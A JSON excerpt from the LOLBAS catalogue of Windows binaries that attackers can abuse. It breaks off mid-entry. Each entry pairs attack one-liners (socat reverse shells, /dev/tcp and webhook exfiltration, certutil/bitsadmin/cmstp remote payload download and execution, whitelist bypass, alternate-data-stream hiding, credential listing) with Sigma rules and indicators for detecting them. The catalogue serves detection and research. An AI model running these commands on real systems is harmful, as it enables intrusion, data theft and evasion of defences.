[{"Name":"AddinUtil.exe","Description":".NET Tool used for updating cache files for Microsoft Office Add-Ins.","Author":"Michael McKinley @MckinleyMike","Created":"2023-10-05","Commands":[{"Command":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AddinUtil.exe -AddinRoot:.","Description":"AddinUtil is executed from the directory where the 'Addins.Store' payload exists, AddinUtil will execute the 'Addins.Store' payload.","Usecase":"Proxy execution of malicious serialized payload","Category":"Execute","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"}],"Full_Path":[{"Path":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AddinUtil.exe"},{"Path":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\AddinUtil.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_addinutil_suspicious_cmdline.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_addinutil_uncommon_child_process.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_addinutil_uncommon_cmdline.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_addinutil_uncommon_dir_exec.yml"}],"Resources":[{"Link":"https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Addinutil/"},{"Name":"AppInstaller.exe","Description":"Tool used for installation of AppX/MSIX applications on Windows 10","Author":"Wade Hickey","Created":"2020-12-02","Commands":[{"Command":"start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw","Description":"AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in INetCache.","Usecase":"Download file from Internet","Category":"Download","Privileges":"User","MitreID":"T1105","OperatingSystem":"Windows 10, Windows 11","Tags":[{"Download":"INetCache"}]}],"Full_Path":[{"Path":"C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\\AppInstaller.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/dns_query/dns_query_win_lolbin_appinstaller.yml"}],"Resources":[{"Link":"https://twitter.com/notwhickey/status/1333900137232523264"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/"},{"Name":"Aspnet_Compiler.exe","Description":"ASP.NET Compilation Tool","Author":"Jimmy (@bohops)","Created":"2021-09-26","Commands":[{"Command":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\aspnet_compiler.exe -v none -p C:\\users\\cpl.internal\\desktop\\asptest\\ -f C:\\users\\cpl.internal\\desktop\\asptest\\none -u","Description":"Execute C# code with the Build Provider and proper folder structure in place.","Usecase":"Execute proxied payload with Microsoft signed binary to bypass application control solutions","Category":"AWL Bypass","Privileges":"User","MitreID":"T1127","OperatingSystem":"Windows 10, Windows 11"}],"Full_Path":[{"Path":"c:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\aspnet_compiler.exe"},{"Path":"c:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\aspnet_compiler.exe"}],"Detection":[{"BlockRule":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_aspnet_compiler.yml"}],"Resources":[{"Link":"https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/"},{"Link":"https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/"},{"Name":"At.exe","Description":"Schedule periodic tasks","Author":"Freddie Barr-Smith","Created":"2019-09-20","Commands":[{"Command":"C:\\Windows\\System32\\at.exe 09:00 /interactive /every:m,t,w,th,f,s,su C:\\Windows\\System32\\revshell.exe","Description":"Create a recurring task to execute every day at a specific time.","Usecase":"Create a recurring task, to eg. to keep reverse shell session(s) alive","Category":"Execute","Privileges":"Local Admin","MitreID":"T1053.002","OperatingSystem":"Windows 7 or older"}],"Full_Path":[{"Path":"C:\\WINDOWS\\System32\\At.exe"},{"Path":"C:\\WINDOWS\\SysWOW64\\At.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_at_interactive_execution.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/network/zeek/zeek_smb_converted_win_atsvc_task.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/builtin/security/win_security_atsvc_task.yml"},{"IOC":"C:\\Windows\\System32\\Tasks\\At1 (substitute 1 with subsequent number of at job)"},{"IOC":"C:\\Windows\\Tasks\\At1.job"},{"IOC":"Registry Key - Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\At1."}],"Resources":[{"Link":"https://freddiebarrsmith.com/at.txt"},{"Link":"https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html"},{"Link":"https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/At/"},{"Name":"Atbroker.exe","Description":"Helper binary for Assistive Technology (AT)","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"ATBroker.exe /start malware","Description":"Start a registered Assistive Technology (AT).","Usecase":"Executes code defined in registry for a new AT. Modifications must be made to the system registry to either register or modify an existing Assistive Technology (AT) service entry.","Category":"Execute","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows 8, Windows 8.1, Windows 10, Windows 11"}],"Full_Path":[{"Path":"C:\\Windows\\System32\\Atbroker.exe"},{"Path":"C:\\Windows\\SysWOW64\\Atbroker.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_susp_atbroker.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml"},{"IOC":"Changes to HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\Configuration"},{"IOC":"Changes to HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs"},{"IOC":"Unknown AT starting C:\\Windows\\System32\\ATBroker.exe /start malware"}],"Resources":[{"Link":"http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Atbroker/"},{"Name":"Bash.exe","Description":"File used by Windows subsystem for Linux","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"bash.exe -c calc.exe","Description":"Executes calc.exe from bash.exe","Usecase":"Performs execution of specified file, can be used as a defensive evasion.","Category":"Execute","Privileges":"User","MitreID":"T1202","OperatingSystem":"Windows 10"},{"Command":"bash.exe -c \"socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane\"","Description":"Executes a reverseshell","Usecase":"Performs execution of specified file, can be used as a defensive evasion.","Category":"Execute","Privileges":"User","MitreID":"T1202","OperatingSystem":"Windows 10"},{"Command":"bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24'","Description":"Exfiltrate data","Usecase":"Performs execution of specified file, can be used as a defensive evasion.","Category":"Execute","Privileges":"User","MitreID":"T1202","OperatingSystem":"Windows 10"},{"Command":"bash.exe -c calc.exe","Description":"Executes calc.exe from bash.exe","Usecase":"Performs execution of specified file, can be used to bypass Application Whitelisting.","Category":"AWL Bypass","Privileges":"User","MitreID":"T1202","OperatingSystem":"Windows 10"}],"Full_Path":[{"Path":"C:\\Windows\\System32\\bash.exe"},{"Path":"C:\\Windows\\SysWOW64\\bash.exe"}],"Detection":[{"BlockRule":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_bash.yml"},{"IOC":"Child process from bash.exe"}],"Resources":[{"Link":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Bash/"},{"Name":"Bitsadmin.exe","Description":"Used for managing background intelligent transfer","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"bitsadmin /create 1 bitsadmin /addfile 1 c:\\windows\\system32\\cmd.exe c:\\data\\playfolder\\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\\data\\playfolder\\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1","Description":"Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command from an Alternate data stream, then resume and complete the job.","Usecase":"Performs execution of specified file in the alternate data stream, can be used as a defensive evasion or persistence technique.","Category":"ADS","Privileges":"User","MitreID":"T1564.004","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"},{"Command":"bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\\data\\playfolder\\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1","Description":"Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.","Usecase":"Download file from Internet","Category":"Download","Privileges":"User","MitreID":"T1105","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"},{"Command":"bitsadmin /create 1 & bitsadmin /addfile 1 c:\\windows\\system32\\cmd.exe c:\\data\\playfolder\\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset","Description":"Command for copying cmd.exe to another folder","Usecase":"Copy file","Category":"Copy","Privileges":"User","MitreID":"T1105","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10"},{"Command":"bitsadmin /create 1 & bitsadmin /addfile 1 c:\\windows\\system32\\cmd.exe c:\\data\\playfolder\\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\\data\\playfolder\\cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset","Description":"One-liner that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.","Usecase":"Execute binary file specified. Can be used as a defensive evasion.","Category":"Execute","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10"}],"Full_Path":[{"Path":"C:\\Windows\\System32\\bitsadmin.exe"},{"Path":"C:\\Windows\\SysWOW64\\bitsadmin.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_bitsadmin_download.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/web/proxy_generic/proxy_ua_bitsadmin_susp_tld.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_bitsadmin_potential_persistence.yml"},{"Splunk":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/bitsadmin_download_file.yml"},{"IOC":"Child process from bitsadmin.exe"},{"IOC":"bitsadmin creates new files"},{"IOC":"bitsadmin adds data to alternate data stream"}],"Resources":[{"Link":"https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679"},{"Link":"https://www.youtube.com/watch?v=_8xJaaQlpBo"},{"Link":"https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/"},{"Name":"CertOC.exe","Description":"Used for installing certificates","Author":"Ensar Samil","Created":"2021-10-07","Commands":[{"Command":"certoc.exe -LoadDLL \"C:\\test\\calc.dll\"","Description":"Loads the target DLL file","Usecase":"Execute code within DLL file","Category":"Execute","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows Server 2022","Tags":[{"Execute":"DLL"}]},{"Command":"certoc.exe -GetCACAPS https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-DllInjection.ps1","Description":"Downloads text formatted files","Usecase":"Download scripts, webshells etc.","Category":"Download","Privileges":"User","MitreID":"T1105","OperatingSystem":"Windows Server 2022"}],"Full_Path":[{"Path":"c:\\windows\\system32\\certoc.exe"},{"Path":"c:\\windows\\syswow64\\certoc.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certoc_load_dll.yml"},{"IOC":"Process creation with given parameter"},{"IOC":"Unsigned DLL load via certoc.exe"},{"IOC":"Network connection via certoc.exe"}],"Resources":[{"Link":"https://twitter.com/sblmsrsn/status/1445758411803480072?s=20"},{"Link":"https://twitter.com/sblmsrsn/status/1452941226198671363?s=20"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Certoc/"},{"Name":"CertReq.exe","Description":"Used for requesting and managing certificates","Author":"David Middlehurst","Created":"2020-07-07","Commands":[{"Command":"CertReq -Post -config https://example.org/ c:\\windows\\win.ini output.txt","Description":"Save the response from a HTTP POST to the endpoint https://example.org/ as output.txt in the current directory","Usecase":"Download file from Internet","Category":"Download","Privileges":"User","MitreID":"T1105","OperatingSystem":"Windows 10, Windows 11"},{"Command":"CertReq -Post -config https://example.org/ c:\\windows\\win.ini","Description":"Send the file c:\\windows\\win.ini to the endpoint https://example.org/ via HTTP POST and show response in terminal","Usecase":"Upload","Category":"Upload","Privileges":"User","MitreID":"T1105","OperatingSystem":"Windows 10, Windows 11"}],"Full_Path":[{"Path":"C:\\Windows\\System32\\certreq.exe"},{"Path":"C:\\Windows\\SysWOW64\\certreq.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml"},{"IOC":"certreq creates new files"},{"IOC":"certreq makes POST requests"}],"Resources":[{"Link":"https://dtm.uk/certreq"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Certreq/"},{"Name":"Certutil.exe","Description":"Windows binary used for handling certificates","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe","Description":"Download and save 7zip to disk in the current folder.","Usecase":"Download file from Internet","Category":"Download","Privileges":"User","MitreID":"T1105","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"},{"Command":"certutil.exe -verifyctl -f -split http://7-zip.org/a/7z1604-x64.exe 7zip.exe","Description":"Download and save 7zip to disk in the current folder.","Usecase":"Download file from Internet","Category":"Download","Privileges":"User","MitreID":"T1105","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"},{"Command":"certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\\temp:ttt","Description":"Download and save a PS1 file to an Alternate Data Stream (ADS).","Usecase":"Download file from Internet and save it in an NTFS Alternate Data Stream","Category":"ADS","Privileges":"User","MitreID":"T1564.004","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"},{"Command":"certutil -encode inputFileName encodedOutputFileName","Description":"Command to encode a file using Base64","Usecase":"Encode files to evade defensive measures","Category":"Encode","Privileges":"User","MitreID":"T1027.013","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"},{"Command":"certutil -decode encodedInputFileName decodedOutputFileName","Description":"Command to decode a Base64 encoded file.","Usecase":"Decode files to evade defensive measures","Category":"Decode","Privileges":"User","MitreID":"T1140","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"},{"Command":"certutil -decodehex encoded_hexadecimal_InputFileName decodedOutputFileName","Description":"Command to decode a hexadecimal-encoded file decodedOutputFileName","Usecase":"Decode files to evade defensive measures","Category":"Decode","Privileges":"User","MitreID":"T1140","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"}],"Full_Path":[{"Path":"C:\\Windows\\System32\\certutil.exe"},{"Path":"C:\\Windows\\SysWOW64\\certutil.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_download.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_encode.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_decode.yml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/4a11ef9514938e7a7e32cf5f379e975cebf5aed3/rules/windows/defense_evasion_suspicious_certutil_commands.toml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/command_and_control_certutil_network_connection.toml"},{"Splunk":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_urlcache_and_split_arguments.yml"},{"Splunk":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_verifyctl_and_split_arguments.yml"},{"Splunk":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_with_decode_argument.yml"},{"IOC":"Certutil.exe creating new files on disk"},{"IOC":"Useragent Microsoft-CryptoAPI/10.0"},{"IOC":"Useragent CertUtil URL Agent"}],"Resources":[{"Link":"https://twitter.com/Moriarty_Meng/status/984380793383370752"},{"Link":"https://twitter.com/mattifestation/status/620107926288515072"},{"Link":"https://twitter.com/egre55/status/1087685529016193025"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Certutil/"},{"Name":"Cmd.exe","Description":"The command-line interpreter in Windows","Author":"Ye Yint Min Thu Htut","Created":"2019-06-26","Commands":[{"Command":"cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat","Description":"Add content to an Alternate Data Stream (ADS).","Usecase":"Can be used to evade defensive countermeasures or to hide as a persistence mechanism","Category":"ADS","Privileges":"User","MitreID":"T1564.004","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"},{"Command":"cmd.exe - < fakefile.doc:payload.bat","Description":"Execute payload.bat stored in an Alternate Data Stream (ADS).","Usecase":"Can be used to evade defensive countermeasures or to hide as a persistence mechanism","Category":"ADS","Privileges":"User","MitreID":"T1059.003","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"},{"Command":"type \\\\webdav-server\\folder\\file.ext > C:\\Path\\file.ext","Description":"Downloads a specified file from a WebDAV server to the target file.","Usecase":"Download/copy a file from a WebDAV server","Category":"Download","Privileges":"User","MitreID":"T1105","OperatingSystem":"Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"},{"Command":"type C:\\Path\\file.ext > \\\\webdav-server\\folder\\file.ext","Description":"Uploads a specified file to a WebDAV server.","Usecase":"Upload a file to a WebDAV server","Category":"Upload","Privileges":"User","MitreID":"T1048.003","OperatingSystem":"Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"}],"Full_Path":[{"Path":"C:\\Windows\\System32\\cmd.exe"},{"Path":"C:\\Windows\\SysWOW64\\cmd.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_alternate_data_streams.yml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_ads_file_creation.toml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml"},{"IOC":"cmd.exe executing files from alternate data streams."},{"IOC":"cmd.exe creating/modifying file contents in an alternate data stream."}],"Resources":[{"Link":"https://twitter.com/yeyint_mth/status/1143824979139579904"},{"Link":"https://twitter.com/Mr_0rng/status/1601408154780446721"},{"Link":"https://medium.com/@mr-0range/a-new-lolbin-using-the-windows-type-command-to-upload-download-files-81d7b6179e22"},{"Link":"https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/type"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Cmd/"},{"Name":"Cmdkey.exe","Description":"creates, lists, and deletes stored user names and passwords or credentials.","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"cmdkey /list","Description":"List cached credentials","Usecase":"Get credential information from host","Category":"Credentials","Privileges":"User","MitreID":"T1078","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"}],"Full_Path":[{"Path":"C:\\Windows\\System32\\cmdkey.exe"},{"Path":"C:\\Windows\\SysWOW64\\cmdkey.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_cmdkey_recon.yml"}],"Resources":[{"Link":"https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation"},{"Link":"https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Cmdkey/"},{"Name":"cmdl32.exe","Description":"Microsoft Connection Manager Auto-Download","Author":"Elliot Killick","Created":"2021-08-26","Commands":[{"Command":"cmdl32 /vpn /lan %cd%\\config","Description":"Download a file from the web address specified in the configuration file. The downloaded file will be in %TMP% under the name VPNXXXX.tmp where \"X\" denotes a random number or letter.","Usecase":"Download file from Internet","Category":"Download","Privileges":"User","MitreID":"T1105","OperatingSystem":"Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"}],"Full_Path":[{"Path":"C:\\Windows\\System32\\cmdl32.exe"},{"Path":"C:\\Windows\\SysWOW64\\cmdl32.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_cmdl32.yml"},{"IOC":"Reports of downloading from suspicious URLs in %TMP%\\config.log"},{"IOC":"Useragent Microsoft(R) Connection Manager Vpn File Update"}],"Resources":[{"Link":"https://github.com/LOLBAS-Project/LOLBAS/pull/151"},{"Link":"https://twitter.com/ElliotKillick/status/1455897435063074824"},{"Link":"https://elliotonsecurity.com/living-off-the-land-reverse-engineering-methodology-plus-tips-and-tricks-cmdl32-case-study/"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Cmdl32/"},{"Name":"Cmstp.exe","Description":"Installs or removes a Connection Manager service profile.","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"cmstp.exe /ni /s c:\\cmstp\\CorpVPN.inf","Description":"Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.","Usecase":"Execute code hidden within an inf file. Download and run scriptlets from internet.","Category":"Execute","Privileges":"User","MitreID":"T1218.003","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11","Tags":[{"Input":"INF"}]},{"Command":"cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf","Description":"Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.","Usecase":"Execute code hidden within an inf file. Execute code directly from Internet.","Category":"AWL Bypass","Privileges":"User","MitreID":"T1218.003","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10","Tags":[{"Input":"INF"}]}],"Full_Path":[{"Path":"C:\\Windows\\System32\\cmstp.exe"},{"Path":"C:\\Windows\\SysWOW64\\cmstp.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_cmstp_execution_by_creation.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_uac_bypass_cmstp.yml"},{"Splunk":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/cmlua_or_cmstplua_uac_bypass.yml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"IOC":"Execution of cmstp.exe without a VPN use case is suspicious"},{"IOC":"DotNet CLR libraries loaded into cmstp.exe"},{"IOC":"DotNet CLR Usage Log - cmstp.exe.log"}],"Resources":[{"Link":"https://twitter.com/NickTyrer/status/958450014111633408"},{"Link":"https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80"},{"Link":"https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e"},{"Link":"https://oddvar.moe/2017/08/15/research-on-cmstp-exe/"},{"Link":"https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1"},{"Link":"https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmstp"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Cmstp/"},{"Name":"Colorcpl.exe","Description":"Binary that handles color management","Author":"Arjan Onwezen","Created":"2023-06-26","Commands":[{"Command":"colorcpl file.txt","Description":"Copies the referenced file to C:\\Windows\\System32\\spool\\drivers\\color\\.","Usecase":"Copies file(s) to a subfolder of a generally trusted folder (c:\\Windows\\System32), which can be used to hide files or make them blend into the environment.","Category":"Copy","Privileges":"User","MitreID":"T1036.005","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"}],"Full_Path":[{"Path":"C:\\Windows\\System32\\colorcpl.exe"},{"Path":"C:\\Windows\\SysWOW64\\colorcpl.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/master/rules/windows/file/file_event/file_event_win_susp_colorcpl.yml"},{"IOC":"colorcpl.exe writing files"}],"Resources":[{"Link":"https://twitter.com/eral4m/status/1480468728324231172"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Colorcpl/"},{"Name":"ConfigSecurityPolicy.exe","Description":"Binary part of Windows Defender. Used to manage settings in Windows Defender. you can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads.","Author":"Ialle Teixeira","Created":"2020-09-04","Commands":[{"Command":"ConfigSecurityPolicy.exe C:\\Windows\\System32\\calc.exe https://webhook.site/xxxxxxxxx?encodedfile","Description":"Upload file, credentials or data exfiltration in general","Usecase":"Upload file","Category":"Upload","Privileges":"User","MitreID":"T1567","OperatingSystem":"Windows 10"},{"Command":"ConfigSecurityPolicy.exe https://example.com/payload","Description":"It will download a remote payload and place it in INetCache.","Usecase":"Downloads payload from remote server","Category":"Download","Privileges":"User","MitreID":"T1105","OperatingSystem":"Windows 10, Windows 11","Tags":[{"Download":"INetCache"}]}],"Full_Path":[{"Path":"C:\\Program Files\\Windows Defender\\ConfigSecurityPolicy.exe"},{"Path":"C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.9-0\\ConfigSecurityPolicy.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_configsecuritypolicy.yml"},{"IOC":"ConfigSecurityPolicy storing data into alternate data streams."},{"IOC":"Preventing/Detecting ConfigSecurityPolicy with non-RFC1918 addresses by Network IPS/IDS."},{"IOC":"Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching ConfigSecurityPolicy.exe."},{"IOC":"User Agent is \"MSIE 7.0; Windows NT 10.0; 